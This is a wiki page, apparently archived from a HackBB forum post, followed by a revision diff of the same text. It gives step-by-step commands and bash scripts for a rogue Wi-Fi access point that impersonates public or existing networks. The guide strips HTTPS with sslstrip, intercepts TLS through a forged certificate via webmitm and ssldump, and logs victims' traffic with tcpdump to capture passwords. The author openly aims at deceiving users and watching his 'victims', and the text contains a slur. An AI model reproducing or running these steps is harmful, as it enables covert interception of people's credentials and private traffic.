Revision as of 16:45, 22 January 2016

Setting Up a Wifi Access Point and Dealing With SSL Author: plasticFork Date Released: 4/20/2012 - On HackBB.

Introduction

This is about setting up a wireless access point then recording all traffic that passes through it, including two ways of dealing with ssl. This guide was written for Linux but the basic principle will still apply to other platforms like BSD, just some of the commands will be different i.e. no iptables in BSD. There are probably other more advanced things you could do like modify the traffic passing through but I won't go into that. This is an alternative to arp-poisoning but achieves pretty much the same thing, or same state of affairs to be precise with traffic being passed through your machine. There are plenty of guides around for arp-poisoning but not so many for setting up access points. The parts about dealing with ssl traffic and logging traffic work exactly the same for arp-poisoning.

Hardware requirements

A wireless card for the access point and another network card for forwarding traffic to the internet, this can either be an ethernet or wireless connection they both work the same.

I'm not sure how "new" is "new" so you may have to do your own research to see if your wireless card is compatible. “All new mac80211 based drivers that implement AP functionality are supported with hostapd's nl80211 driver. “ http://linuxwireless.org/en/users/Documentation/hostapd

Setting up the AP

hostapd for turning the wireless card into an access point

dnsmasq for dhcp

iptables for nating

Traffic monitoring

Option one

sslstrip

tcpdump

Option two

webmitm (dsniff)

ssldump

Setting up the AP

First things first you need to connect your linux box to the internet. Like I mentioned before an ethernet or wireless connection work just fine. If you go for the wireless route you'll need two network cards, one for the access point and one for connection to the internet. The same card can't do both; that might sound obvious but you'd be surprised.... For the rest of this guide eth0 will be the interface connected to the internet, It's important you do this first, I had problems setting up the access point then connecting to the internet later.

Configuring stuff

hostapd

(host access point daemon)

This is a program that will turn your wireless card into an access point (I'll be using wlan0 for that). This is the part where you decide your network's ssid, encryption and password.

hostapd is configured with a file called /etc/hostapd/hostapd.conf

interface=wlan0

driver=nl80211

ssid=safe_free_public_wifi

channel=8

wpa=3

wpa_passphrase=secret_password

wpa_key_mgmt=WPA-PSK

wpa_pairwise=CCMP TKIP

hw_mode=g

You can leave off the 4 wpa... lines and it will just be an open access point, no password.

dnsmasq

This program will automatically assign ip addresses to the computers connecting to your ap. Without this the clients would need to set their own ip addresses which is not very windows-fag friendly.

dnsmasq is configured with a file called /etc/dnsmasq.conf

This important fields to have in this file are

interface=wlan0

dhcp-range=192.168.0.50,192.168.0.150,12h

dhcp-option=3,192.168.0.1

Note the ip address in the 3rd line need to be the ip of the access point, which we'll set later. 192.168.0.1 is a good one.

iptables

This will forward traffic from wlan0 to eth0. Replace eth0 with your internet facing interface. If you're unfamiliar with iptables you can run these 5 lines individually from the terminal or put them into a textfile and run it with "bash <filename>" We'll be putting all the required lines into a textfile like this later on for simple startup/shutdown of the access point. The iptable commands stack together so you can add even more later. To clear all the current rules use iptables -F

iptables -F

iptables -t nat -F

iptables -A FORWARD -i eth0 -d 192.168.0.0/255.255.0.0 -j ACCEPT

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

echo 1 > /proc/sys/net/ipv4/ip_forward

Start up wlan0

I think assigning a specific ip address to wlan0 is important since I ran into trouble when I didn't. The industry standard is to use 192.168.x.x for internal ip addresses. I'll just use 192.168.0.1 This is also the time to set the access point mac address, either for anonymity reasons or to impersonate another access point. If you're making up your own mac address make sure the first block is even i.e. 10, 12, 14 ... 1A, 1C, 1E ifconfig wlan0 192.168.0.1 netmask 255.255.255.0 hw ether 10:11:12:13:14:15 or simply just ifconfig wlan0 192.168.0.1 netmask 255.255.255.0 Without the mac foolery.

Dealing with SSL

Of course you don't *have* to deal with ssl traffic you can just ignore it. But here are two ways of dealing with it

Method 1 sslstrip

Least conspicuous. This essentially redirects https traffic to http. The user may notice that a website does not say https in the address bar when it should and the browser may give a warning that the user is submitting non encrypted data so it's not completely invisible. However these are things most users ignore...

sslstrip is written in python so there's no need to compile it/find a precompiled binary. You can download it here www.thoughtcrime.org/software/sslstrip/

There is no need to configure sslstrip itself but you will need an extra iptable rule. All traffic bound for port 80 needs to be redirected to a port that sslstrip is listening on. Then sslstrip will do its magic.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000

Then run it with

python sslstrip.py -l 9000 -f lock.ico 
</per>

You can leave out the -f lock.ico. This is a cheap padlock favicon picture that will display in the victim's browser when they try to visit a https site (and sslstrip redirects it to the http version). Cute but it could also raise extra suspicion so use your own judgement.

Note this does not work against every website. Torproject.org for example is unaffected. Also this trumps the httseverywhere add-on.

==Method 2 full fat man in the middle==

This is generating a fake certificate, using that to encrypt/decrypt all ssl traffic. It's not as hard as it sounds but it comes with the major disadvantage that if you're making your own certificate web browsers like firefox will flag this up to the user and force them to go through a painstaking "add security exception" screen which is not very subtle at all and will frankly fail with a lot of targets.

To do this we need an iptable rule, a program called ssldump and a program called webmitm, which is apart of a package called dsniff.

<pre>
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT

Then run it with

webmitm -d

You'll be guided through making a certificate. The less believable your answers, the less believable your certificate.

ssldump -n -d -k webmitm.crt >> ssldump.log

Recording traffic

There are plenty of guides on how to do this with wireshark, tshark (wireshark cli if you're not running X) and tcpdump.

Here's a quick example of using tcpdump

tcpdump -i wlan0 -s 0 -Apnq >> logfile

-i wlan0 is the interface to listen to. You could also do eth0 but this will also capture packets originating from the machine the ap is running on.

-s 0 sets the default amount of data to capture per packet

-A outputs the data in ascii, which is useful if you're sniffing for login details

-p prevents the card from entering promiscuous mode This might not be needed but we don;t want to pick up traffic from other nearby access points.

-pn are just options to leave out some information we're not interested in.

There are also other tools available which will listen and parse out passwords and interesting things automatically. I'll admit I'm rather immaturely motivated by watching all of my victims traffic not just the passwords.

Easy start/stop

Ok so now we need to put it all together into convenient script file.

#!/bin/bash
ifconfig wlan0 192.168.0.1 netmask 255.255.255.0
dnsmasq
iptables -F
iptables -t nat -F
iptables -A FORWARD -i eth0 -d 192.168.0.0/255.255.0.0 -j ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
hostapd -d /etc/hostapd/hostapd.conf &
<pre>


For sslstrip

<pre>
#!/bin/bash
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000
python sslstrip.py -l 9000 -f lock.ico &
tcpdump -i wlan0 -s 0 -Apnq >> /home/plasticFork/logfile &

for webmitm

#!/bin/bash
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT
webmitm -d
ssldump -n -d -k webmitm.crt >> ssldump.log &

and here's a bring down script

#!/bin/bash
ifconfig wlan0 down
killall dnsmasq
iptables -F
killall hostapd
killall sslstrip
killall tcpdump
killall webmitm
killall ssldump

Dsniff/PlasticForkGuide HackBB: Difference between revisions

From charlesreid1

Revision as of 16:45, 22 January 2016

Contents

Introduction

Hardware requirements

Setting up the AP

Option one

Option two

Setting up the AP

Configuring stuff

hostapd

dnsmasq

iptables

Start up wlan0

Dealing with SSL

Method 1 sslstrip

Recording traffic

@@ Line 4: / Line 4: @@
-Contents [hide]
+=Introduction=
-Introduction
-Hardware requirements
-Setting up the AP
-Configuring stuff
-Dealing with SSL
-Easy start/stop
-Conclusion
-Comments
-Introduction
 This is about setting up a wireless access point then recording all traffic that passes through it, including two ways of dealing with ssl. This guide was written for Linux but the basic principle will still apply to other platforms like BSD, just some of the commands will be different i.e. no iptables in BSD. There are probably other more advanced things you could do like modify the traffic passing through but I won't go into that.
@@ Line 22: / Line 10: @@
 The parts about dealing with ssl traffic and logging traffic work exactly the same for arp-poisoning.
-Hardware requirements
+=Hardware requirements=
 A wireless card for the access point and another network card for forwarding traffic to the internet, this can either be an ethernet or wireless connection they both work the same.
 I'm not sure how "new" is "new" so you may have to do your own research to see if your wireless card is compatible. “All new mac80211 based drivers that implement AP functionality are supported with hostapd's nl80211 driver. “ http://linuxwireless.org/en/users/Documentation/hostapd
-Setting up the AP
+=Setting up the AP=
 hostapd for turning the wireless card into an access point
 dnsmasq for dhcp
 iptables for nating
 Traffic monitoring
-Option one
+==Option one==
 sslstrip
 tcpdump
-Option two
+==Option two==
 webmitm (dsniff)
 ssldump
-Setting up the AP
+=Setting up the AP=
 First things first you need to connect your linux box to the internet. Like I mentioned before an ethernet or wireless connection work just fine. If you go for the wireless route you'll need two network cards, one for the access point and one for connection to the internet. The same card can't do both; that might sound obvious but you'd be surprised.... For the rest of this guide eth0 will be the interface connected to the internet,
 It's important you do this first, I had problems setting up the access point then connecting to the internet later.
-Configuring stuff
+=Configuring stuff=
+==hostapd==
+(host access point daemon)
+This is a program that will turn your wireless card into an access point (I'll be using wlan0 for that). This is the part where you decide your network's ssid, encryption and password.
-hostapd
-(host access point daemon?) This is a program that will turn your wireless card into an access point (I'll be using wlan0 for that). This is the part where you decide your network's ssid, encryption and password.
 hostapd is configured with a file called /etc/hostapd/hostapd.conf
+<pre>
 interface=wlan0
 driver=nl80211
 ssid=safe_free_public_wifi
 channel=8
 wpa=3
 wpa_passphrase=secret_password
 wpa_key_mgmt=WPA-PSK
 wpa_pairwise=CCMP TKIP
 hw_mode=g
+</pre>
 You can leave off the 4 wpa... lines and it will just be an open access point, no password.
-dnsmasq
+==dnsmasq==
 This program will automatically assign ip addresses to the computers connecting to your ap. Without this the clients would need to set their own ip addresses which is not very windows-fag friendly.
 dnsmasq is configured with a file called /etc/dnsmasq.conf
 This important fields to have in this file are
+<pre>
 interface=wlan0
 dhcp-range=192.168.0.50,192.168.0.150,12h
 dhcp-option=3,192.168.0.1
+</pre>
 Note the ip address in the 3rd line need to be the ip of the access point, which we'll set later. 192.168.0.1 is a good one.
-iptables
+==iptables==
 This will forward traffic from wlan0 to eth0. Replace eth0 with your internet facing interface. If you're unfamiliar with iptables you can run these 5 lines individually from the terminal or put them into a textfile and run it with "bash <filename>" We'll be putting all the required lines into a textfile like this later on for simple startup/shutdown of the access point. The iptable commands stack together so you can add even more later. To clear all the current rules use iptables -F
+<pre>
 iptables -F
 iptables -t nat -F
 iptables -A FORWARD -i eth0 -d 192.168.0.0/255.255.0.0 -j ACCEPT
 iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
 echo 1 > /proc/sys/net/ipv4/ip_forward
+</pre>
+=Start up wlan0=
-Start up wlan0
 I think assigning a specific ip address to wlan0 is important since I ran into trouble when I didn't. The industry standard is to use 192.168.x.x for internal ip addresses. I'll just use 192.168.0.1 This is also the time to set the access point mac address, either for anonymity reasons or to impersonate another access point. If you're making up your own mac address make sure the first block is even i.e. 10, 12, 14 ... 1A, 1C, 1E
 ifconfig wlan0 192.168.0.1 netmask 255.255.255.0 hw ether 10:11:12:13:14:15
@@ Line 81: / Line 117: @@
 Without the mac foolery.
-Dealing with SSL
+=Dealing with SSL=
 Of course you don't *have* to deal with ssl traffic you can just ignore it. But here are two ways of dealing with it
-Method 1 sslstrip
+==Method 1 sslstrip==
 Least conspicuous. This essentially redirects https traffic to http. The user may notice that a website does not say https in the address bar when it should and the browser may give a warning that the user is submitting non encrypted data so it's not completely invisible. However these are things most users ignore...
 sslstrip is written in python so there's no need to compile it/find a precompiled binary. You can download it here www.thoughtcrime.org/software/sslstrip/
 There is no need to configure sslstrip itself but you will need an extra iptable rule. All traffic bound for port 80 needs to be redirected to a port that sslstrip is listening on. Then sslstrip will do its magic.
+<pre>
 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000
+</pre>
 Then run it with
+<pre>
 python sslstrip.py -l 9000 -f lock.ico
+</per>
 You can leave out the -f lock.ico. This is a cheap padlock favicon picture that will display in the victim's browser when they try to visit a https site (and sslstrip redirects it to the http version). Cute but it could also raise extra suspicion so use your own judgement.
 Note this does not work against every website. Torproject.org for example is unaffected. Also this trumps the httseverywhere add-on.
-Method 2 full fat man in the middle
+==Method 2 full fat man in the middle==
 This is generating a fake certificate, using that to encrypt/decrypt all ssl traffic. It's not as hard as it sounds but it comes with the major disadvantage that if you're making your own certificate web browsers like firefox will flag this up to the user and force them to go through a painstaking "add security exception" screen which is not very subtle at all and will frankly fail with a lot of targets.
 To do this we need an iptable rule, a program called ssldump and a program called webmitm, which is apart of a package called dsniff.
+<pre>
 iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT
+</pre>
 Then run it with
+<pre>
 webmitm -d
-You'll be guided through making a certificate. You can literally just press enter for all the questions if you just want to get it working but it might be worth putting some effort and creativity into it if you actually want to try and fool people.
+</pre>
+You'll be guided through making a certificate. The less believable your answers, the less believable your certificate.
+<pre>
 ssldump -n -d -k webmitm.crt >> ssldump.log
-Recording traffic. There are plenty of guides on how to do this with wireshark, tshark(wireshark cli if you're not running X) and tcpdump.
+</pre>
+=Recording traffic=
+There are plenty of guides on how to do this with wireshark, tshark (wireshark cli if you're not running X) and tcpdump.
 Here's a quick example of using tcpdump
+<pre>
 tcpdump -i wlan0 -s 0 -Apnq >> logfile
+</pre>
 -i wlan0 is the interface to listen to. You could also do eth0 but this will also capture packets originating from the machine the ap is running on.
 -s 0 sets the default amount of data to capture per packet
 -A outputs the data in ascii, which is useful if you're sniffing for login details
 -p prevents the card from entering promiscuous mode This might not be needed but we don;t want to pick up traffic from other nearby access points.
 -pn are just options to leave out some information we're not interested in.
 There are also other tools available which will listen and parse out passwords and interesting things automatically. I'll admit I'm rather immaturely motivated by watching all of my victims traffic not just the passwords.
@@ Line 115: / Line 190: @@
 Ok so now we need to put it all together into convenient script file.
+<pre>
 #!/bin/bash
 ifconfig wlan0 192.168.0.1 netmask 255.255.255.0
@@ Line 124: / Line 201: @@
 echo 1 > /proc/sys/net/ipv4/ip_forward
 hostapd -d /etc/hostapd/hostapd.conf &
+<pre>
 For sslstrip
+<pre>
 #!/bin/bash
 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000
 python sslstrip.py -l 9000 -f lock.ico &
 tcpdump -i wlan0 -s 0 -Apnq >> /home/plasticFork/logfile &
+</pre>
 for webmitm
+<pre>
 #!/bin/bash
 iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT
 webmitm -d
 ssldump -n -d -k webmitm.crt >> ssldump.log &
+</pre>
 and here's a bring down script
+<pre>
 #!/bin/bash
 ifconfig wlan0 down
@@ Line 144: / Line 234: @@
 killall webmitm
 killall ssldump
+</pre>